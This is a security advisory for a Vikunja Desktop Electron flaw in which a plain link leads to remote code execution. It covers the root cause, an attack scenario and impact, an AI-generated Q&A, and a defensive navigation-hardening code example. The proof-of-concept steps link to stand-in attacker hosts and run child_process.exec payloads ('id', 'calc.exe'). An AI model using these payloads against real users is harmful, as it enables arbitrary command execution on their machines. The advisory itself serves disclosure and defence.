CVE-2026-33336
Status: Received - Intake
Node Integration RCE via Unsafe Navigation in Vikunja Desktop

Publication date: 2026-03-24

Last updated on: 2026-03-27

Assigner: GitHub, Inc.

Description
Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim's machine. Version 2.2.0 patches the issue.

## Root cause

Two misconfigurations combine to create this vulnerability:

1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.).
2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by:
   - `<a href="https://...">` links (without `target="_blank"`)
   - `window.location` assignments
   - HTTP redirects
   - `<meta http-equiv="refresh">` tags

## Attack scenario

1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project).
2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `<a href="https://evil.example/exploit">Click here for the updated design spec</a>`
3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: `frontend/src/views/project/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output.
4. The victim uses Vikunja Desktop and clicks the link.
5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https://evil.example/exploit` in the same renderer process.
6. The attacker's page now executes in a context with `nodeIntegration: true` and runs: `require('child_process').exec('id > /tmp/pwned');`
7. Arbitrary commands execute as the victim's OS user.

## Impact

Full remote code execution on the victim's desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient.

## Proof of concept

1. Set up a Vikunja instance with two users sharing a project.
2. As the attacker user, edit a project description to include: `<a href="https://attacker.example/poc.html">Meeting notes</a>`
3. Host poc.html with: `<script>require('child_process').exec('calc.exe')</script>`
4. As the victim, open the project in Vikunja Desktop and click the link.
5. calc.exe (or any other command) executes on the victim's machine.

## Credits

This vulnerability was found using [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).
Meta Information
Published: 2026-03-24
Last Modified: 2026-03-27
Generated: 2026-05-27
AI Q&A: 2026-03-24
EPSS Evaluated: 2026-05-25
Affected Vendors & Products
Showing 1 associated CPE
Vendor: vikunja
Product: vikunja
Version / Range: From 0.21.0 (inc) to 2.2.2 (exc)
CWE
CWE-94: The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-33336 is a critical remote code execution vulnerability in the Vikunja Desktop Electron application affecting versions from 0.21.0 up to but not including 2.2.0.

The vulnerability arises because the Electron BrowserWindow is configured with nodeIntegration enabled, which grants any loaded page full access to Node.js APIs such as require, child_process, and fs.

Additionally, there is no handler registered for same-window navigations (like clicking standard HTML links) which allows the BrowserWindow to navigate to attacker-controlled URLs without interception.

An attacker who is a legitimate user on the same Vikunja instance can embed a sanitized but malicious hyperlink in user-generated content (such as task or project descriptions). When a victim using Vikunja Desktop clicks this link, the BrowserWindow navigates to the attacker’s page where JavaScript executes with full Node.js access, enabling arbitrary code execution on the victim’s machine.


How can this vulnerability impact me?

This vulnerability allows an attacker to execute arbitrary code on the victim’s desktop remotely.

  • The attacker can read and write arbitrary files on the victim’s machine.
  • The attacker can execute arbitrary commands with the victim’s OS user privileges.
  • Malware or backdoors can be installed by the attacker.
  • Sensitive data and credentials can be exfiltrated.

Importantly, no cross-site scripting (XSS) vulnerability is required; a sanitized hyperlink alone is sufficient to exploit this flaw.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

I don't know


How can this vulnerability be detected on my network or system? Can you suggest some commands?

I don't know


What immediate steps should I take to mitigate this vulnerability?

The immediate mitigation is to upgrade Vikunja Desktop to version 2.2.0 or later, where the vulnerability is patched.

This patch disables nodeIntegration in the BrowserWindow and adds handlers for same-window navigations to prevent attacker-controlled origins from executing arbitrary Node.js code.

Until upgrading, avoid clicking links in user-generated content within Vikunja Desktop, especially from untrusted users.
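The advisory's root-cause section names the two missing controls (a `will-navigate`/`will-redirect` handler and `nodeIntegration` turned off), and the mitigation answer above describes the same shape of fix. The following is an added example of what such an Electron main-process hardening looks like; it is not Vikunja's own code or its actual patch. `APP_ORIGIN` is a constructed placeholder, and the window and shell objects are injected so the policy can be exercised without Electron installed; the real wiring is shown in a comment.

```javascript
// Added example (not Vikunja's code or patch): hardened Electron main-process
// navigation policy for the misconfiguration described in this advisory.
// APP_ORIGIN is a constructed placeholder; window/shell objects are injected so
// the policy can run without Electron.

// Constructed placeholder for the origin the desktop app loads its UI from.
const APP_ORIGIN = 'https://vikunja.internal.example';

// The opposite of `nodeIntegration: true`: the renderer gets no Node.js APIs.
const SAFE_WEB_PREFERENCES = {
  nodeIntegration: false,
  contextIsolation: true,
  sandbox: true,
};

// Classify a navigation target: 'allow' (same origin as the app), 'external'
// (http/https elsewhere, handed to the OS browser) or 'deny' (anything else:
// file:, javascript:, custom schemes, unparseable strings).
function classifyNavigation(targetUrl, appOrigin) {
  let parsed;
  try {
    parsed = new URL(targetUrl);
  } catch (_) {
    return 'deny';
  }
  if (parsed.origin === appOrigin) return 'allow';
  if (parsed.protocol === 'https:' || parsed.protocol === 'http:') return 'external';
  return 'deny';
}

// Register the policy on a BrowserWindow-like object. Covers the paths the
// advisory lists: same-window navigation (`will-navigate`), HTTP redirects
// (`will-redirect`) and `window.open()` (`setWindowOpenHandler`).
function hardenNavigation(win, shell, appOrigin) {
  const onNavigate = (event, url) => {
    const verdict = classifyNavigation(url, appOrigin);
    if (verdict === 'allow') return;
    event.preventDefault(); // the main window never leaves the app origin
    if (verdict === 'external') shell.openExternal(url); // OS browser instead
  };
  win.webContents.on('will-navigate', onNavigate);
  win.webContents.on('will-redirect', onNavigate);
  win.webContents.setWindowOpenHandler(({ url }) => {
    if (classifyNavigation(url, appOrigin) === 'external') shell.openExternal(url);
    return { action: 'deny' }; // never spawn a new BrowserWindow for content links
  });
}

// Drive the policy with stand-in window and shell objects and report what
// happened. Returns { prevented, opened } for a simulated click on `url`.
function simulateClick(url, appOrigin) {
  const handlers = {};
  const opened = [];
  const win = {
    webContents: {
      on: (name, fn) => { handlers[name] = fn; },
      setWindowOpenHandler: (fn) => { handlers.windowOpen = fn; },
    },
  };
  const shell = { openExternal: (u) => { opened.push(u); return Promise.resolve(); } };
  hardenNavigation(win, shell, appOrigin);
  let prevented = false;
  handlers['will-navigate']({ preventDefault: () => { prevented = true; } }, url);
  return { prevented, opened };
}

// Real wiring (assumed; needs Electron, so kept as a comment here):
//   const { app, BrowserWindow, shell } = require('electron');
//   app.whenReady().then(() => {
//     const win = new BrowserWindow({ webPreferences: SAFE_WEB_PREFERENCES });
//     hardenNavigation(win, shell, APP_ORIGIN);
//     win.loadURL(APP_ORIGIN);
//   });

console.log(simulateClick('https://evil.example/exploit', APP_ORIGIN));
// → { prevented: true, opened: [ 'https://evil.example/exploit' ] }
```

The two controls are independent and both matter: the navigation policy keeps an attacker-controlled origin out of the app's window in the first place, while `nodeIntegration: false` with `contextIsolation: true` means that even a page that does get loaded has no `require` to reach `child_process`. Handing external http/https links to `shell.openExternal` preserves the ability to follow links in task descriptions without ever rendering foreign content inside the privileged window.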

